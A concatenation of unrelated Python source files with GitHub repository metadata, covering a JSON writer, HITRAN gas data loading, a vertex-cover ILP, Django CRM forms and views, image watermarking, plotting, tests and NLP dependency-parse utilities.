if self._is_state(_State.OBJECT_PROPERTY_AFTER_VALUE):
self._fp.write("{}\"{}\"{}".format(self._item_separator, name, self._key_separator))
self._set_state(_State.OBJECT_PROPERTY_AFTER_NAME)
elif self._is_state(_State.OBJECT_STARTED):
self._fp.write("\"{}\"{}".format(name, self._key_separator))
self._set_state(_State.OBJECT_PROPERTY_AFTER_NAME)
else:
self._fail("start property")
def write_property(self, name, value):
self.start_property(name)
self.write_value(value)
def write_value(self, value):
if self._is_state(_State.INITIAL):
self._fp.write(self._encoder.encode(value))
self._set_state(_State.DONE)
elif self._is_state(_State.OBJECT_PROPERTY_AFTER_NAME):
self._fp.write(self._encoder.encode(value))
self._set_state(_State.OBJECT_PROPERTY_AFTER_VALUE)
elif self._is_state(_State.ARRAY_AFTER_VALUE):
self._fp.write("{}{}".format(self._item_separator, self._encoder.encode(value)))
elif self._is_state(_State.ARRAY_STARTED):
self._fp.write(self._encoder.encode(value))
self._set_state(_State.ARRAY_AFTER_VALUE)
else:
self._fail("value")
def end_object(self):
if self._is_state(_State.OBJECT_PROPERTY_AFTER_VALUE, _State.OBJECT_STARTED):
self._fp.write("}")
self._pop_state()
else:
self._fail("end object")
def flush(self):
self._fp.flush()
def close(self):
self._fp.flush()
self._fp.close()
def _push_state(self, state):
self._state.append(state)
def _pop_state(self):
return self._state.pop()
def _is_state(self, *states):
return self._state[-1] in states
def _set_state(self, state):
self._state[-1] = state
def _peek_state(self):
return self._state[-1]
def _fail(self, op_name):
raise ValueError("Invalid state for {}: {}".format(op_name, self._peek_state()))
def _write_indent(self):
if self._indent is None:
return
else:
self._fp.write("\n")
|
[
"cbuschka@gmail.com"
] |
cbuschka@gmail.com
|
17b0c4bb31a2b73c753b146078a95266e2007669
|
846aa5f955058b6bef8a6f0b7824c7d1bdec2310
|
/coronagraph-master/old/readsmart/gas_info.py
|
4bb1b99f2c1a09ca965580df43a92d2604e3a54d
|
[] |
no_license
|
giadasprink/luvoir_simtools
|
ba96c7a5542d4c7e43d49c0050de0e5c84eb42fd
|
fa7d58de958d36eeb81975172b33964e114d1700
|
refs/heads/master
| 2021-01-12T14:40:23.621431
| 2016-11-04T17:11:07
| 2016-11-04T17:11:07
| 72,046,880
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,596
|
py
|
def gas_info():
"""
Loads and returns HITRAN gas information (description)
Parameters
----------
None
Returns
-------
load_gases.gas_info(): tuple array (mixed type)
Notes
-------
This program loads the gas codes, formula code, descriptor string
(formula name), mean molecular masses, and wavenumber coverage of HITRAN gases
1-47 and additional noble and volcanic gases from gases.csv in /fixed_input/.'
There are three gas code designations:
'index' - the value that corresponds to the position of the gas info in the tuple array.
This also corresponds to the HITRAN gas index up until gas number '47'.
'h_index' - HITRAN gas index. Set to '0' if not a HITRAN gas.
'old_index' - index value of gas for old smart_interface bash code.
Matches 'index' and 'h_index' through gas index=39.
The formula code is realized in three forms:
'Formula' - molecular formula with proper capitalization
(string, e.g. 'CH3Cl')
'FORMULA' - molecular formula all caps (string, e.g. 'CH3CL')
'formula' - molecular formula all lower case (string, e.g. 'ch3cl')
These additional attributes are contained in the tuple:
'name' - common name for the molecule or atomic gas species
'mass' - mean molecular mass in g/mol
'minwn' - minimum wavenumber of transitions cataloged in HITRAN 2012 database
'maxwn' - maximum wavenumber of transitions cataloged in HITRAN 2012 database
'n' - index of refraction of the gas at 589 nm at STP (n=-1 if unknown)
References
-------
HITRAN gas codes from: http://www.cfa.harvard.edu/hitran/molecules.html
Mean molecular masses from Wikipedia: http://www.wikipedia.org
Refractive indices from: http://www.kayelaby.npl.co.uk/general_physics/2_5/2_5_7.html
Examples
-------
>>> load_gases.gas_info()[:][1]
(1, 1, 1, 'H2O', 'H2O', 'h2o', 'water', 18.02, 0.0, 25711.0, 1.000256)
>>> load_gases.gas_info()['FORMULA'][48]
'HE'
>>> load_gases.gas_info()['Formula'][48]
'He'
>>> load_gases.gas_info()['Formula'][37]
'HOBr'
"""
import numpy as np
import os
module_path = os.path.dirname(__file__)
#read gases csv file
file_name = '/'.join([module_path,'gases.csv'])
#file_name = 'fixed_input/gases.csv'
gas_info = np.genfromtxt(file_name,dtype=None,delimiter=',',comments='#',\
names=['index', 'h_index', 'old_index', 'Formula', 'FORMULA', 'formula', 'name', \
'mass', 'minwn', 'maxwn', 'n'])
return gas_info
|
[
"tumlinson@stsci.edu"
] |
tumlinson@stsci.edu
|
2c859b253fac52407a7a2212bb929210128fbe9b
|
c5e8e718f594356c34ea129dff00cc309ba0ac9c
|
/python352/myenv/lib/python3.5/tokenize.py
|
896bb4117f26e08aaf66e19238414085ddc27393
|
[] |
no_license
|
melnikaite/benchmarks
|
7f605039273bc5b0638c14f7d9bed56b7eda0186
|
d9c87873b0f6de4204030aeaeb35582ab6d9ca3d
|
refs/heads/master
| 2020-04-15T12:43:04.256491
| 2018-02-08T00:01:19
| 2018-02-12T10:35:11
| 65,220,513
| 3
| 4
| null | 2018-02-12T10:35:12
| 2016-08-08T16:28:34
|
Python
|
UTF-8
|
Python
| false
| false
| 65
|
py
|
/Users/melnikaite/.pyenv/versions/3.5.2/lib/python3.5/tokenize.py
|
[
"melnikaite.melnikaite@gmail.com"
] |
melnikaite.melnikaite@gmail.com
|
9a257d7cfb13814c6d325e4427720b746db62afa
|
0ff95a63f29b05ff8a894effcb3760de876deb42
|
/Pickle_Graffiti/graph_txt_files/txt_functions/vertex_cover_number.py
|
7dafe5ed1a06aacbe2e8ee0d2ed843597fab3089
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
RandyRDavila/Pickle_Graffiti
|
5e956031422918312215b7691e21b1307d3e0161
|
c54128d36eac1f013e9c544fabc81fd15056c250
|
refs/heads/master
| 2020-03-18T15:22:28.288345
| 2018-06-17T21:49:47
| 2018-06-17T21:49:47
| 134,903,705
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,613
|
py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2017 by
# David Amos <somacdivad@gmail.com>
# Randy Davila <davilar@uhd.edu>
# BSD license.
#
# Authors: David Amos <somacdivad@gmail.com>
# Randy Davila <davilar@uhd.edu>
"""Functions for computing vertex covers and related invariants in a graph."""
from pulp import LpBinary, LpMinimize, LpProblem, LpVariable, lpSum
def min_vertex_cover_ilp(G):
"""Return a smallest vertex cover in the graph G.
This method uses an ILP to solve for a smallest vertex cover.
Specifically, the ILP minimizes
.. math::
\\sum_{v \\in V} x_v
subject to
.. math::
x_v + x_u \\geq 1 \\mathrm{for all } \\{u, v\\} \\in E
x_v \\in \\{0, 1\\} \\mathrm{for all } v \\in V
where *V* and *E* are the vertex and edge sets of *G*.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
set
A set of nodes in a smallest vertex cover.
"""
prob = LpProblem('min_vertex_cover', LpMinimize)
variables = {
node: LpVariable('x{}'.format(i+1), 0, 1, LpBinary)
for i, node in enumerate(G.nodes())
}
# Set the total domination number objective function
prob += lpSum([variables[n] for n in variables])
# Set constraints
for edge in G.edges():
prob += variables[edge[0]] + variables[edge[1]] >= 1
prob.solve()
solution_set = {node for node in variables if variables[node].value() == 1}
return solution_set
def min_vertex_cover(G, method='ilp'):
"""Return a smallest vertex cover of G.
A *vertex cover* of a graph *G* is a set of vertices with the
property that every edge in the graph is incident to at least one
vertex in the set.
Parameters
----------
G : NetworkX graph
An undirected graph.
method: string
The method to use for finding a smallest vertex cover.
Currently, the only option is 'ilp'. Defaults to 'ilp'.
Returns
-------
set
A set of nodes in a smallest vertex cover.
"""
vertex_cover_func = {
'ilp': min_vertex_cover_ilp,
}.get(method, None)
if vertex_cover_func:
return vertex_cover_func(G)
raise ValueError('Invalid `method` argument "{}"'.format(method))
def vertex_cover_number(G):
"""Return a the size of smallest vertex cover in the graph G.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
number
The size of a smallest vertex cover of G.
"""
return len(min_vertex_cover_ilp(G))
|
[
"randydavila@Randys-MacBook-Pro.local"
] |
randydavila@Randys-MacBook-Pro.local
|
5a9f2c65fb8af43f7235e7e8c0937d9c97e3caa7
|
2591b2b409b8cefedd6b226f0381aafea2aa123c
|
/leads/forms.py
|
11814485238e54ca5315f97dcd17215e7a3eb24f
|
[
"MIT"
] |
permissive
|
coderj001/Django-CRM
|
ae5f0cb6b6c5b5dba1e0713c32978f49b021e39f
|
7cca0df5d39b92082781047c1f0a11129179f257
|
refs/heads/master
| 2023-08-14T02:38:26.534561
| 2021-09-15T06:38:45
| 2021-09-15T06:38:45
| 369,114,686
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,235
|
py
|
from django import forms
from django.contrib.auth.forms import UserCreationForm, UsernameField
from leads.models import Agent, Lead, User
class LeadModelForm(forms.ModelForm):
class Meta:
model = Lead
fields = (
'first_name',
'last_name',
'age',
'agent',
'description',
'phone_number',
'email',
)
class LeadForm(forms.Form):
first_name = forms.CharField()
last_name = forms.CharField()
age = forms.IntegerField(min_value=0)
class CustomUserCreationForm(UserCreationForm):
class Meta:
model = User
fields = ("username", )
field_classes = {'username': UsernameField}
class AssignAgentForm(forms.Form):
agent = forms.ModelChoiceField(queryset=Agent.objects.none())
def __init__(self, *args, **kwargs):
request = kwargs.pop('request')
agents = Agent.objects.filter(organisation=request.user.userprofile)
super(AssignAgentForm, self).__init__(*args, **kwargs)
self.fields['agent'].queryset = agents
class LeadCategoryUpdateForm(forms.ModelForm):
class Meta:
model = Lead
fields = (
'category',
)
|
[
"amirajubolchi001@gmail.com"
] |
amirajubolchi001@gmail.com
|
ed3a392122a91de6cdf437e0aae63e716e4b07fa
|
cce6fe18b46418de3df3384bd08707ca37dc85d8
|
/venv/lib/python2.7/copy_reg.py
|
ac6440875a567528d4c7b788bdea18c4372ca098
|
[] |
no_license
|
kyorgancioglu/CerebroServer
|
805bb4b6d3980bfd12ee02d5ee3627cb2f475da5
|
077fac942d5e20874e26468a0ceebf1f9fd94521
|
refs/heads/master
| 2021-01-19T18:14:02.638900
| 2017-05-08T14:48:10
| 2017-05-08T14:48:10
| 88,349,015
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
/Users/kaanyorgancioglu/anaconda2/lib/python2.7/copy_reg.py
|
[
"yorgancioglu.kaan@gmail.com"
] |
yorgancioglu.kaan@gmail.com
|
3aa284408b648d5cc4ba72c6e62f10f1f8ec9043
|
826d8196891852edf4e1ebe364120b916e320bb0
|
/blog/apps/views_staff.py
|
ff13e16848799f8c8a6c2b1859f7ef03a1c9d962
|
[] |
no_license
|
mtien10/flyandrew
|
6f1acdda37de44935d493945cb90ad99a6aea414
|
b3820d7a8069feb76efe3107398930e23d03614c
|
refs/heads/master
| 2023-08-24T12:49:58.732673
| 2021-09-24T06:52:15
| 2021-09-24T06:52:15
| 390,921,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,981
|
py
|
import json
from django.shortcuts import render
from django.shortcuts import HttpResponse
from django.shortcuts import get_object_or_404
from django.contrib.auth.decorators import login_required
from .models import *
from django.views.generic.edit import CreateView
from django.views.generic.edit import UpdateView
from django.contrib.auth.mixins import LoginRequiredMixin
from datetime import datetime
@login_required
def index(request):
return render(request, 'index.html')
# Category
@login_required
def listCategory(request):
categoryList = Category.objects.all()
context = {'categoryList': categoryList}
return render(request, 'staff/category/list.html', context)
class CategoryCreateView(LoginRequiredMixin, CreateView):
model = Category
fields = '__all__'
template_name = 'staff/category/form.html'
success_url = '/staff'
class CategoryUpdateView(LoginRequiredMixin, UpdateView):
model = Category
fields = '__all__'
template_name = 'staff/category/form.html'
success_url = '/staff'
@login_required
def deleteCategory(request, pk):
error = ''
success = False
if request.method == 'POST':
try:
c = Category.objects.get(pk=pk)
c.delete()
success = True
except Exception as e:
error = str(e)
else:
error = 'Method not allow'
result = {'success': success, 'errors': error}
return HttpResponse(json.dumps(result), content_type='application/json')
# Product
@login_required
def listProduct(request):
productList = Product.objects.all()
context = {'productList': productList}
return render(request, 'staff/product/list.html', context)
class ProductCreateView(LoginRequiredMixin, CreateView):
model = Product
fields = '__all__'
template_name = 'staff/product/form.html'
success_url = '/staff/list-product'
class ProductUpdateView(LoginRequiredMixin, UpdateView):
model = Product
fields = '__all__'
template_name = 'staff/product/form.html'
success_url = '/staff/list-product'
@login_required
def deleteProduct(request, pk):
error = ''
success = False
if request.method == 'POST':
try:
p = Product.objects.get(pk=pk)
p.delete()
success = True
except Exception as e:
error = str(e)
else:
error = 'Method not allow'
result = {'success': success, 'errors': error}
return HttpResponse(json.dumps(result), content_type='application/json')
# Order
@login_required
def listOrder(request):
orderList = Order.objects.all()
context = {'orderList': orderList}
return render(request, 'staff/order/list.html', context)
@login_required
def viewOrder(request, pk):
order = get_object_or_404(Order, pk=pk)
context = {'order': order}
return render(request, 'staff/order/view_detail.html', context)
@login_required
def confirmOrderDelivered(request, pk):
error = ''
success = False
if request.method == 'POST':
try:
order = get_object_or_404(Order, pk=pk)
order.status = Order.Status.DELIVERED
order.deliverDate = datetime.now()
order.save()
success = True
except Exception as e:
error = str(e)
else:
error = 'Method not allow'
result = {'success': success, 'errors': error}
return HttpResponse(json.dumps(result), content_type='application/json')
def cancelOrder(request, pk):
error = ''
success = False
if request.method == 'POST':
try:
order = get_object_or_404(Order, pk=pk)
order.status = Order.Status.CANCELLED
order.save()
success = True
except Exception as e:
error = str(e)
else:
error = 'Method not allow'
result = {'success': success, 'errors': error}
return HttpResponse(json.dumps(result), content_type='application/json')
|
[
"tao.gboy@gmail.com"
] |
tao.gboy@gmail.com
|
12c623c20c5499450064a7ba06592696cd33d4a4
|
5abe97395fa199f652568ed13bae922ed4143737
|
/string3.py
|
33d378be2b9a29817e385208a92edf34ac537fb3
|
[] |
no_license
|
XanderEagle/unit7
|
7aa0590eec1e52712c85e85472a44444b98912cb
|
7d8ccc1a05ad9ad0002167f465c275109b4e5e22
|
refs/heads/master
| 2020-09-05T07:22:43.706795
| 2019-11-15T15:16:42
| 2019-11-15T15:16:42
| 220,025,095
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 142
|
py
|
def without_end(word):
return word[1:len(word)-1]
print(without_end("Hello"))
print(without_end("Python"))
print(without_end("coding"))
|
[
"alexander.eagle@ssfs.org"
] |
alexander.eagle@ssfs.org
|
2d53ca54d3805eb81d7ede0b47f643a341a88008
|
b1aa3c599c5d831444e0ae4e434f35f57b4c6c45
|
/month1/week2/class5/pillow5.py
|
45a028b539a26bd107597ff2defa4b69744fdd06
|
[] |
no_license
|
yunyusha/xunxibiji
|
2346d7f2406312363216c5bddbf97f35c1e2c238
|
f6c3ffb4df2387b8359b67d5e15e5e33e81e3f7d
|
refs/heads/master
| 2020-03-28T12:31:17.429159
| 2018-09-11T11:35:19
| 2018-09-11T11:35:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 898
|
py
|
from PIL import Image, ImageChops, ImageDraw, ImageFont
img = Image.open('img/1.jpg')
# 切换图片模式
img = img.convert('RGBA')
# 创建一个背景完全透明的图片模板,大小和原始图片一样大
w, h = img.size
new_img = Image.new('RGBA', (w, h), (0, 0, 0, 0))
# 使用ImageDraw生成一个画笔
# 此过程需要用户提前指定需要操作的图片
draw_1 = ImageDraw.Draw(new_img)
# 绘制文字
# 使用imageFont生成对应的字体
font = ImageFont.truetype('img/111.ttf', 50)
draw_1.text((100, 300), '啦啦啦啦啦', font=font, fill=(100, 101, 100))
new_img = new_img.rotate(45)
# 设置new_img向左下角移动
new_img = ImageChops.offset(new_img, -30, 30)
# new_img.show()
# 将文字和图片进行合并
combine_img = Image.alpha_composite(img, new_img)
combine_img.show()
# 图片保存
combine_img = combine_img.convert('RGB')
combine_img.save('kkk.jpg')
|
[
"576462286@qq.com"
] |
576462286@qq.com
|
47a14850a6883ecc86d83ddb8afe50e0011f8b56
|
b7947f82403adc72ee2413971272cb7cd0c7c685
|
/docs/examples/example.py
|
ad05bc5073c22d878b87d30729c83a883901e072
|
[
"Apache-2.0"
] |
permissive
|
WISDEM/RotorSE
|
e752f3ff77c0bdf768a96340036dbbc367d7af66
|
a4f75ed79f5ca10c869ed803037b52d5e74f0927
|
refs/heads/master
| 2021-06-03T12:52:19.847283
| 2019-09-04T14:15:44
| 2019-09-04T14:15:44
| 16,748,519
| 3
| 14
|
NOASSERTION
| 2019-07-26T16:50:33
| 2014-02-11T22:51:25
|
Python
|
UTF-8
|
Python
| false
| false
| 281
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import sys
import os
# just to temporarily change PYTHONPATH without installing
sys.path.append(os.path.expanduser('~') + '/Dropbox/NREL/RotorSE/src/rotorse')
# 1 ---
from rotoraero import RotorAeroVSVP
rotor = RotorAeroVSVP()
# 1 ---
|
[
"andrew.ning@nrel.gov"
] |
andrew.ning@nrel.gov
|
7f3f1ecdf11cd198d1eca349180cc1b2698f1eb2
|
89e47e1a0dd8ca96dbaf236340dd1c7732bf62db
|
/depgraph.py
|
3e06a8e5882d7cf7e8b89a80823d5763de43df8c
|
[] |
no_license
|
cmps143-nlp/homework_8
|
44f2f8e515a02134765e2f5563a8417052e6ea90
|
da037a754212545405db8a084ecb91659f47bad3
|
refs/heads/master
| 2021-01-10T13:06:17.416478
| 2015-06-06T20:32:01
| 2015-06-06T20:32:01
| 36,994,378
| 0
| 0
| null | 2015-06-08T22:20:06
| 2015-06-06T20:36:12
|
Python
|
UTF-8
|
Python
| false
| false
| 10,171
|
py
|
#!/usr/bin/env python
'''
Created on May 14, 2014
@author: reid
'''
import os, re, sys, nltk, operator
from nltk.parse import DependencyGraph
from nltk.stem.wordnet import WordNetLemmatizer
import utils
import baseline as bl
import hw6
# Note: the dependency tags return by Stanford Parser are slightly different than
# what NLTK expects. We tried to change all of them, but in case we missed any, this
# method should correct them for you.
def update_inconsistent_tags(old):
return old.replace("root", "ROOT")
# Read the lines of an individual dependency parse
def read_dep(fh):
dep_lines = []
qid = None
first = True
for line in fh:
#if(first): print (line)
line = line.strip()
if len(line) == 0:
#print("\n".join(dep_lines))
#input('>')
return (update_inconsistent_tags("\n".join(dep_lines)), qid)
elif re.match(r"^QuestionId:\s+(.*)$",line):
# You would want to get the question id here and store it with the parse
qid = line[len("QuestionID: "):len(line)]
continue
dep_lines.append(line)
return (update_inconsistent_tags("\n".join(dep_lines)), qid) if len(dep_lines) > 0 else (None,qid)
# Read the dependency parses from a file
def read_dep_parses(depfile):
fh = open(depfile, 'r')
# list to store the results
graphs = []
qgraphs = {}
# Read the lines containing the first parse.
dep,qid = read_dep(fh)
# print(dep)
# graph = DependencyGraph("""There EX 3 expl
# once RB 3 advmod
# was VBD 0 ROOT
# a DT 5 det
# crow NN 3 nsubj""")
# graphs.append(graph)
# While there are more lines:
# 1) create the DependencyGraph
# 2) add it to our list
# 3) try again until we're done
while dep is not None:
graph = DependencyGraph(dep)
if(qid):
qgraphs[qid] = graph
else:
graphs.append(graph)
dep,qid = read_dep(fh)
fh.close()
return graphs if len(qgraphs.items()) < 1 else qgraphs
def get_relation(dgraph, node, rel):
#node['deps'][rel]
i = node['deps'][rel][0]
return node_ati(dgraph, i)
def find_relation(graph, rel, root=None):
''' finds nodes related to root with relation rel.
root defaults to entire graph root.'''
if root:
node_list = root.deps()
else:
node_list = graph.nodes.values()
nodes = []
for node in node_list:
if not 'rel' in node.keys():
continue
if node['rel'] == rel:
nodes.append(node)
return nodes
def node_ati(graph, index):
''' returns the node object with address = index if it exists,
otherwise returns None. '''
for node in graph.nodes.values():
if node['address'] == index:
return node
return None
def find_main(graph):
for node in graph.nodes.values():
if node['rel'] == 'ROOT':
return node
return None
def find_nodeByWord(word, graph, overlap=False, tag='VB'):
nodelist = []
#print('word: ', word)
for node in graph.nodes.values():
if not "word" in node.keys():
continue
#if word == 'stood' or word == 'standing':
# print(bl.lemmatize(word, tag) , bl.lemmatize(node["word"], node["tag"]))
w1, t = bl.lemmatize(word, tag)
w2, t = bl.lemmatize(node["word"], node["tag"])
if node["word"] == word:
nodelist.append(node)
elif w1 == w2:
'''print(node)
print(w1, w2)
print('.')'''
nodelist.append(node)
elif overlap:
#print('w1: ', word, '\tw2: ', node["word"])
if utils.overlap(word, node["word"], 3):
#print('overlp: ', node)
nodelist.append(node)
'''else:
synonyms = bl.getSyns(word)
if node['word'] in synonyms:
nodelist.append(node) '''
return nodelist
def good_address(lst, addr):
size = len(lst)
return 0<= addr and addr < size
def get_neighbors(lst, a, n):
res = []
for i in range(n):
# range starts at zeor so add 1.
if good_address(lst, a +i +1):
res.append(lst[ a+i +1])
if good_address(lst, a -i -1):
res.append(lst[ a-i -1])
return res
def get_dependents_shallow(node, graph, dmax, depth, n):
results = []
if depth > dmax:
return results
for item in node["deps"]:
address = node["deps"][item][0]
results += get_neighbors(graph.nodes, address, n)
dep = graph.nodes[address]
results.append(dep)
results = results + get_dependents_shallow(dep, graph, dmax, depth+1, n)
return results
def graph2sent(sgraph):
''' returns a pos tagged and lower()ed sentence. '''
words = []
words = [ ((node['word']).lower(), node['tag']) for node in sgraph.nodes.values()
if 'word' in node.keys() if 'tag' in node.keys() if node['word'] ]
#for node in sgraph.nodes.values():
# if 'word' in node.keys() and 'tag' in node.keys():
# words.append(((node['word']).lower(), node['tag']))
return words
def get_segment_after_word( vnode, sent):
# sch sentences are short so return everthing following the verb.
#if qtype == 'sch':
ans = [w[0] for w in sent]
addr = vnode['address'] +1
wanted = set(['DT', 'TO', 'IN'])
# also add the previous word if it is a determinr
if sent[addr-1][1] in wanted:
addr -= 1
ans = ans[addr : addr+10]
return " ".join(ans).rstrip(' .,!\n?')
def get_dependents(node, graph):
results = []
for item in node["deps"]:
address = node["deps"][item][0]
dep = graph.nodes[address]
results.append(dep)
results = results + get_dependents(dep, graph)
return results
def get_relatives(graph, rel, i=0, pos=None):
relatives = find_relation(graph, rel)
if pos:
for r_node in relatives:
n = node_ati(graph, r_node['address'] -i)
if n['tag'] == pos:
relatives.append(n)
return [r["word"] for r in relatives]
def get_all_byWord(glist, target_word):
targlist = []
length = len(glist)
for g in range(length):
nodes = find_nodeByWord(target_word, glist[g])
if len(nodes) > 0:
targlist.append((nodes, g))
return targlist
def find_answer(qgraph, sgraph):
#print('qgraph: \n', qgraph, '\n')
qmain = find_main(qgraph)
assert qmain
#print('qmain: \n',qmain, '\n')
qword = qmain["word"]
#print('qword: ', qword)
#print(type(sgraph))
#print('sgraph: \n', sgraph)
snode = None
try:
snode = find_nodeByWord(qword, sgraph)
except KeyError:
#print('qgraph: ', qgraph)
#print()
#print('sgraph: ', sgraph)
#input('>')
pass
if not snode:
print('error: find_answer() not snode')
return None
for node in sgraph.nodes.values():
#print("node in nodelist:", node)
#print(type(node))
if node.get('head', None) == snode["address"]:
#print("Our parent is:", snode)
#print("Our relation is:", node['rel'])
if node['rel'] == "prep":
deps = get_dependents(node, sgraph)
deps = sorted(deps, key=operator.itemgetter("address"))
return " ".join(dep["word"] for dep in deps)
def find_answer2(qgraph, sgraph):
qmain = find_main(qgraph)
deps = get_dependents_shallow(qmain, sgraph, 3, 0, 0)
#deps = sorted(deps, key=operator.itemgetter("address"))
deps = set(dep['word'].lower() for dep in deps if 'word' in dep.keys() if dep['word'])
return " ".join( w for w in deps )#if dep['word'])
def load_dep_files(file_extension):
dep_graphs = {}
for filename in os.listdir("."):
if filename.endswith(file_extension):
graphs = read_dep_parses(filename)
if file_extension == ".questions.dep":
dep_graphs.update(graphs)
else:
dep_graphs[filename[:-len(file_extension)]]= graphs
#print(dep_graphs)
#input('>')
return dep_graphs
def load_all_deps():
sch_deps_extension = ".sch.dep"
story_deps_extension = ".story.dep"
q_deps_extension = ".questions.dep"
sdeps = {}
sdeps['sch'] = load_dep_files(sch_deps_extension)
sdeps['story'] = load_dep_files(story_deps_extension)
qdeps = load_dep_files(q_deps_extension)
return sdeps, qdeps
def find_q(qlist, target):
for q, i in zip(qlist, range(len(qlist))):
if q.qid == target:
return i
return None
if __name__ == '__main__':
text_file = "fables-01.story"
dep_file = "fables-01.story.dep"
q_file = "fables-01.questions.dep"
# dict
sgraphs = read_dep_parses(dep_file)
# list
qgraphs = read_dep_parses(q_file)
# Get the question
questions = hw6.load_questions()
i = find_q(questions, 'fables-01-2')
question = questions[i]
assert question
print('question: ')
print(question)
# qgraph is a dict not a list
qgraph = qgraphs['fables-01-2']
#print("qgraph: ",qgraph)
# find the sentence containing the answer
#qsent = bl.get_sentences(question)[0]
"""
sgraph = sgraphs[1]
lmtzr = WordNetLemmatizer()
for node in sgraph.nodes.values():
tag = node["tag"]
word = node["word"]
if word is not None:
if tag.startswith("V"):
print(lmtzr.lemmatize(word, 'v'))
else:
print(lmtzr.lemmatize(word, 'n'))
print()
answer = find_answer(qgraph, sgraph)
print(answer)
"""
|
[
"davan108@yahoo.com"
] |
davan108@yahoo.com
|
52d16b684f2d333ae0f84ce5dc7dc796dd3d14e9
|
f7c462bf748bf4e2d59f460cda61b357f40059fb
|
/Realtime Graph.py
|
efe195af25e1593f06e837e64d51042c97d8a147
|
[] |
no_license
|
bormanjo/Project-Gamma
|
80aca334c82d9fdc971fc23e2db90b962e6ec603
|
f8bf7d1f53360bb46ab74aedbff36698c1b3491a
|
refs/heads/master
| 2016-08-11T20:14:07.299798
| 2016-02-02T19:03:59
| 2016-02-02T19:03:59
| 44,758,088
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 523
|
py
|
import sys
sys.path.append('/Users/jzmanrulz/anaconda/lib/python3.4/site-packages')
import matplotlib.pyplot as plt
import numpy as np
import time
fig = plt.figure()
ax = fig.add_subplot(111)
x = np.arange(10000)
y = np.random.randn(10000)
li, = ax.plot(x,y)
fig.canvas.draw()
plt.show()
while True:
try:
y[:-10] = y[10:]
y[-10:] = np.random.randn(10)
li.set_ydata(y)
fig.canvas.draw()
time.sleep(0.01)
except KeyboardInterrupt:
break
|
[
"jzmanrulz@gmail.com"
] |
jzmanrulz@gmail.com
|
7b434b2719c36ca20ea15fa5da601a27eef6411d
|
155cbccc3ef3b8cba80629f2a26d7e76968a639c
|
/thelma/tests/functional/test_rack.py
|
e40ebb879314b508491ce9ef3818b992627c074b
|
[
"MIT"
] |
permissive
|
papagr/TheLMA
|
1fc65f0a7d3a4b7f9bb2d201259efe5568c2bf78
|
d2dc7a478ee5d24ccf3cc680888e712d482321d0
|
refs/heads/master
| 2022-12-24T20:05:28.229303
| 2020-09-26T13:57:48
| 2020-09-26T13:57:48
| 279,159,864
| 1
| 0
|
MIT
| 2020-07-12T22:40:36
| 2020-07-12T22:40:35
| null |
UTF-8
|
Python
| false
| false
| 1,605
|
py
|
"""
Created on Dec 09, 2014.
"""
from pyramid.httpexceptions import HTTPOk
from everest.mime import XmlMime
from everest.resources.utils import get_root_collection
from thelma.interfaces import ITubeRack
from thelma.tests.functional.conftest import TestFunctionalBase
class TestRackFunctional(TestFunctionalBase):
path = '/tube-racks'
setup_rdb_context = True
def test_load_racks(self, app_creator):
rsp = app_creator.get(self.path,
params=dict(size=10),
status=HTTPOk.code)
assert not rsp is None
def test_patch_set_location(self, app_creator,
rack_patch_set_location_data):
rack_bc = '02490469'
loc_id = 1513
rsp = app_creator.patch('%s/%s' % (self.path, rack_bc),
params=rack_patch_set_location_data,
content_type=XmlMime.mime_type_string,
status=HTTPOk.code)
assert not rsp is None
coll = get_root_collection(ITubeRack)
rack = coll[rack_bc]
lr = rack.get_entity().location_rack
assert not lr is None
assert lr.location.id == loc_id
def test_patch_unset_location(self, app_creator):
rack_bc = '02481966'
rsp = app_creator.delete('%s/%s/location' % (self.path, rack_bc),
status=HTTPOk.code)
assert not rsp is None
coll = get_root_collection(ITubeRack)
rack = coll[rack_bc]
assert rack.get_entity().location_rack is None
|
[
"fogathmann@gmail.com"
] |
fogathmann@gmail.com
|
a5aa4f455c320dad648c0b6b8b039c70ad37babc
|
2c956da7e4ebd03ba1bdaa9f72d58c5b5d8190f4
|
/logica.py
|
6e70615e0061ae35b94a3bc91ae1085ecb101e2b
|
[] |
no_license
|
jlcastr/dacodeslogica
|
f1c9ef04df815a7727915575c194c3c7ee03d3b4
|
d632d2c94e392c2ab9a24fc175645471c312a794
|
refs/heads/master
| 2022-11-29T11:24:54.125335
| 2020-07-30T16:54:28
| 2020-07-30T16:54:28
| 283,722,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 578
|
py
|
#esquina superior de una cuadricula N x M
#mirando a la derecha, sigue camiando un cuadro a la vez en la direccion que esta mirando
#(dirección derecha)
#----------------------
#|(0,0)|(0,1)|(0,2)|
#|(1,0)|(1,1)|(1,2)|
#|(2,0)|(2,1)|(2,2)|
#---------------------
def recorrido(N,M):
if (N > M):
if (M % 2 == 0):
print('Arriba')
else:
print('Abajo')
else:
if (N%2== 0):
print('Izquierda')
else:
print('Derecha')
#recorrido(0,4)
recorrido(1,1)
recorrido(2,2)
recorrido(3,1)
recorrido(3,3)
|
[
"jlcastr7@gmail.com"
] |
jlcastr7@gmail.com
|
8d9df479c2b41b52b6d9e48842ac8f49b3981495
|
a1565d1736ed9ce98c2bec48fcd21b9ad491aca5
|
/MediaTrailers/MediaTrailers/runserver.py
|
3fc9d6fb157f32afde80c22d5668e7f698fc347a
|
[] |
no_license
|
dmatis/media-trailers
|
5461f81c7a01b09511c377f08dc1cf191b569031
|
5d16694cc67dc2602b93938e915233bedab6b6e6
|
refs/heads/master
| 2020-07-03T17:28:32.258258
| 2016-09-02T21:09:12
| 2016-09-02T21:09:12
| 66,577,999
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 347
|
py
|
"""
This script runs the MediaTrailers application using a development server.
"""
